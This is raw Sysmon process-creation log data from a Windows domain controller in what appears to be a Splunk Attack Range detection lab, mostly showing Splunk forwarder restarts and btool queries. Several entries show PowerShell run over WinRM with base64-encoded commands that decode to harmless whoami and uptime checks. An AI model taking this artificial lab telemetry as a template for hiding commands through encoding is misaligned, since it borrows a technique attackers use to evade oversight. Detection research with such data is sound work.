AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-3E77-6078-9400-00000000AE01}3192C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE" restart --waitonpid=2064 154100x80000000000000004142Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:24:10.135{A8622C2F-3E7A-6078-A400-00000000AE01}4324C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool server list httpServer --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{A8622C2F-3E7A-6078-A300-00000000AE01}4960C:\Program Files\SplunkUniversalForwarder\bin\btool.exebtool server list httpServer --no-log 154100x80000000000000004129Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:24:10.127{A8622C2F-3E7A-6078-A300-00000000AE01}4960C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exebtool server list httpServer --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{A8622C2F-3E7A-6078-A200-00000000AE01}4100C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c btool server list httpServer --no-log 154100x80000000000000004116Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:24:10.119{A8622C2F-3E7A-6078-A200-00000000AE01}4100C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c btool server list httpServer --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-3E77-6078-9400-00000000AE01}3192C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE" restart --waitonpid=2064 154100x80000000000000004061Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:24:08.464{A8622C2F-3E78-6078-9F00-00000000AE01}5076C:\Windows\System32\msdtc.exe2001.12.10941.16384 (rs1_release.160715-1616)Microsoft Distributed Transaction Coordinator ServiceMicrosoft® Windows® Operating SystemMicrosoft CorporationMSDTC.EXEC:\Windows\System32\msdtc.exeC:\Windows\system32\NT AUTHORITY\NETWORK SERVICE{A8622C2F-3DEE-6078-E403-000000000000}0x3e40SystemMD5=308F08347923DEEDE7BC03EC7D485841,SHA256=72DB45CA11FE635DF9F8273C38CBEFB8DF5362ADA0CBF6D2B1E570365DC700C0,IMPHASH=D02F3DF332409C5D3F34BA2D38FC4ED4{A8622C2F-3DEC-6078-0A00-00000000AE01}832C:\Windows\System32\services.exeC:\Windows\system32\services.exe 154100x80000000000000004026Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:24:07.792{A8622C2F-3E77-6078-9D00-00000000AE01}4884C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool server list kvstore --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{A8622C2F-3E77-6078-9C00-00000000AE01}4760C:\Program Files\SplunkUniversalForwarder\bin\btool.exebtool server list kvstore --no-log 154100x80000000000000004013Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:24:07.786{A8622C2F-3E77-6078-9C00-00000000AE01}4760C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exebtool server list kvstore --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{A8622C2F-3E77-6078-9B00-00000000AE01}4776C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c btool server list kvstore --no-log 154100x80000000000000004000Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:24:07.780{A8622C2F-3E77-6078-9B00-00000000AE01}4776C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c btool server list kvstore --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-3E77-6078-9400-00000000AE01}3192C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE" restart --waitonpid=2064 154100x80000000000000003985Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:24:07.499{A8622C2F-3E77-6078-9A00-00000000AE01}4696C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool server list general --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{A8622C2F-3E77-6078-9900-00000000AE01}4672C:\Program Files\SplunkUniversalForwarder\bin\btool.exebtool server list general --no-log 154100x80000000000000003972Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:24:07.493{A8622C2F-3E77-6078-9900-00000000AE01}4672C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exebtool server list general --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{A8622C2F-3E77-6078-9800-00000000AE01}4664C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c btool server list general --no-log 154100x80000000000000003959Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:24:07.487{A8622C2F-3E77-6078-9800-00000000AE01}4664C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c btool server list general --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-3E77-6078-9400-00000000AE01}3192C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE" restart --waitonpid=2064 154100x80000000000000003944Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:24:07.196{A8622C2F-3E77-6078-9700-00000000AE01}3536C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool web list settings --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{A8622C2F-3E77-6078-9600-00000000AE01}3908C:\Program Files\SplunkUniversalForwarder\bin\btool.exebtool web list settings --no-log 154100x80000000000000003931Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:24:07.189{A8622C2F-3E77-6078-9600-00000000AE01}3908C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exebtool web list settings --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{A8622C2F-3E77-6078-9500-00000000AE01}3376C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c btool web list settings --no-log 154100x80000000000000003918Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:24:07.183{A8622C2F-3E77-6078-9500-00000000AE01}3376C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c btool web list settings --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-3E77-6078-9400-00000000AE01}3192C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE" restart --waitonpid=2064 154100x80000000000000003905Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:24:07.171{A8622C2F-3E77-6078-9400-00000000AE01}3192C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe8.0.2splunk Applicationsplunk ApplicationSplunk Inc.splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE" restart --waitonpid=2064C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BA47934C1D8F8F5D495F67F9B6EF5D0B,SHA256=39A00C55E1BC2233DBEE2A3F2F8CB9BD3668275DCA5F83BD11958FAF50E8C8CE,IMPHASH=4D753DA340C903D8C30CD8B0CF2B73E3{A8622C2F-3E77-6078-9300-00000000AE01}2780C:\Program Files\SplunkUniversalForwarder\bin\splunk.exesplunk _relaunch restart --accept-license --answer-yes --no-prompt --waitonpid=2064 154100x80000000000000003892Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:24:07.159{A8622C2F-3E77-6078-9300-00000000AE01}2780C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe8.0.2splunk Applicationsplunk ApplicationSplunk Inc.splunk.exesplunk _relaunch restart --accept-license --answer-yes --no-prompt --waitonpid=2064C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BA47934C1D8F8F5D495F67F9B6EF5D0B,SHA256=39A00C55E1BC2233DBEE2A3F2F8CB9BD3668275DCA5F83BD11958FAF50E8C8CE,IMPHASH=4D753DA340C903D8C30CD8B0CF2B73E3{A8622C2F-3DFE-6078-2F00-00000000AE01}2064C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000003805Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:23:21.593{A8622C2F-3E49-6078-9200-00000000AE01}3344C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-3DFE-6078-2F00-00000000AE01}2064C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000003788Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:23:19.823{A8622C2F-3E47-6078-9100-00000000AE01}5028C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-3DFE-6078-2F00-00000000AE01}2064C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000003772Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:23:19.150{A8622C2F-3E47-6078-9000-00000000AE01}4136C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-3DFE-6078-2F00-00000000AE01}2064C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000003758Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:23:18.179{A8622C2F-3E46-6078-8F00-00000000AE01}5060C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-3DFE-6078-2F00-00000000AE01}2064C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000003743Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:23:16.471{A8622C2F-3E44-6078-8E00-00000000AE01}4816C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-3DFE-6078-2F00-00000000AE01}2064C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000003728Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:23:15.563{A8622C2F-3E43-6078-8D00-00000000AE01}4912C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-3DFE-6078-2F00-00000000AE01}2064C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000003714Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:23:14.686{A8622C2F-3E42-6078-8C00-00000000AE01}4832C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-3DFE-6078-2F00-00000000AE01}2064C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000003676Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:22:51.472{A8622C2F-3E2B-6078-8B00-00000000AE01}4464C:\Windows\System32\reg.exe10.0.14393.0 (rs1_release.160715-1616)Registry Console ToolMicrosoft® Windows® Operating SystemMicrosoft Corporationreg.exeC:\Windows\system32\reg.exe query hklm\software\microsoft\windows\softwareinventorylogging /v collectionstate /reg:64C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=59A22FA6CF85026BB6BC69A1ADD75C50,SHA256=9E28034CE3AEEA6951F790F8997DF44CFBF80BEFF9FB17413DBA317016A716AD,IMPHASH=EE7EB7FA7D163340753B7223ADA14352{A8622C2F-3E2B-6078-8A00-00000000AE01}4252C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\system32\reg.exe query hklm\software\microsoft\windows\softwareinventorylogging /v collectionstate /reg:64 154100x80000000000000003663Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:22:51.463{A8622C2F-3E2B-6078-8A00-00000000AE01}4252C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c C:\Windows\system32\reg.exe query hklm\software\microsoft\windows\softwareinventorylogging /v collectionstate /reg:64C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-3E2B-6078-8800-00000000AE01}4348C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /d /c C:\Windows\system32\silcollector.cmd configure 154100x80000000000000003616Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:22:43.377{A8622C2F-3E23-6078-8700-00000000AE01}3748C:\Windows\System32\whoami.exe10.0.14393.0 (rs1_release.160715-1616)whoami - displays logged on user informationMicrosoft® Windows® Operating SystemMicrosoft Corporationwhoami.exe"C:\Windows\system32\whoami.exe"C:\Users\Administrator\ATTACKRANGE\Administrator{A8622C2F-3E23-6078-9184-080000000000}0x884910HighMD5=AA1E17EA3DB5CD9D8BC061CAEC74C6E8,SHA256=8ECFFCCE38D4EE87ABAEE6CBE843D94D4F8FB98FAB3C356C7F6B70E60B10F88A,IMPHASH=E24E330FA9663CE77F2031CACAEB3DF9{A8622C2F-3E23-6078-8600-00000000AE01}5036C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand dwBoAG8AYQBtAGkA 154100x80000000000000003589Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:22:43.204{A8622C2F-3E23-6078-8600-00000000AE01}5036C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEPowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand dwBoAG8AYQBtAGkAC:\Users\Administrator\ATTACKRANGE\Administrator{A8622C2F-3E23-6078-9184-080000000000}0x884910HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{A8622C2F-3E23-6078-8500-00000000AE01}5024C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand dwBoAG8AYQBtAGkA 154100x80000000000000003576Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:22:43.198{A8622C2F-3E23-6078-8500-00000000AE01}5024C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand dwBoAG8AYQBtAGkAC:\Users\Administrator\ATTACKRANGE\Administrator{A8622C2F-3E23-6078-9184-080000000000}0x884910HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-3E23-6078-8300-00000000AE01}4948C:\Windows\System32\winrshost.exeC:\Windows\system32\WinrsHost.exe -Embedding 154100x80000000000000003557Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:22:43.105{A8622C2F-3E23-6078-8300-00000000AE01}4948C:\Windows\System32\winrshost.exe10.0.14393.0 (rs1_release.160715-1616)Host Process for WinRM's Remote Shell pluginMicrosoft® Windows® Operating SystemMicrosoft Corporationwinrshost.exeC:\Windows\system32\WinrsHost.exe -EmbeddingC:\Windows\system32\ATTACKRANGE\Administrator{A8622C2F-3E23-6078-9184-080000000000}0x884910HighMD5=F40EC96CA18D88CB1F26FA2070010714,SHA256=607C014A3CA531FFAD50BCD90095C01E4E6B691D9E18473C70E4699CF1E31453,IMPHASH=4216D8E7F36901B61DFD6309B49BCF96{A8622C2F-3DED-6078-0C00-00000000AE01}592C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 154100x80000000000000003522Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:22:42.648{A8622C2F-3E22-6078-8200-00000000AE01}4820C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEPowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand KABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMATgBhAG0AZQAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBMAGEAcwB0AEIAbwBvAHQAVQBwAFQAaQBtAGUAC:\Users\Administrator\ATTACKRANGE\Administrator{A8622C2F-3E22-6078-6445-080000000000}0x845640HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{A8622C2F-3E22-6078-8100-00000000AE01}4808C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand KABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMATgBhAG0AZQAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBMAGEAcwB0AEIAbwBvAHQAVQBwAFQAaQBtAGUA 154100x80000000000000003509Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:22:42.642{A8622C2F-3E22-6078-8100-00000000AE01}4808C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand KABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMATgBhAG0AZQAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBMAGEAcwB0AEIAbwBvAHQAVQBwAFQAaQBtAGUAC:\Users\Administrator\ATTACKRANGE\Administrator{A8622C2F-3E22-6078-6445-080000000000}0x845640HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-3E22-6078-7F00-00000000AE01}4732C:\Windows\System32\winrshost.exeC:\Windows\system32\WinrsHost.exe -Embedding 154100x80000000000000003490Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:22:42.542{A8622C2F-3E22-6078-7F00-00000000AE01}4732C:\Windows\System32\winrshost.exe10.0.14393.0 (rs1_release.160715-1616)Host Process for WinRM's Remote Shell pluginMicrosoft® Windows® Operating SystemMicrosoft Corporationwinrshost.exeC:\Windows\system32\WinrsHost.exe -EmbeddingC:\Windows\system32\ATTACKRANGE\Administrator{A8622C2F-3E22-6078-6445-080000000000}0x845640HighMD5=F40EC96CA18D88CB1F26FA2070010714,SHA256=607C014A3CA531FFAD50BCD90095C01E4E6B691D9E18473C70E4699CF1E31453,IMPHASH=4216D8E7F36901B61DFD6309B49BCF96{A8622C2F-3DED-6078-0C00-00000000AE01}592C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 154100x80000000000000002935Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:22:30.557{A8622C2F-3E16-6078-7C00-00000000AE01}4140C:\Windows\System32\winrshost.exe10.0.14393.0 (rs1_release.160715-1616)Host Process for WinRM's Remote Shell pluginMicrosoft® Windows® Operating SystemMicrosoft Corporationwinrshost.exeC:\Windows\system32\WinrsHost.exe 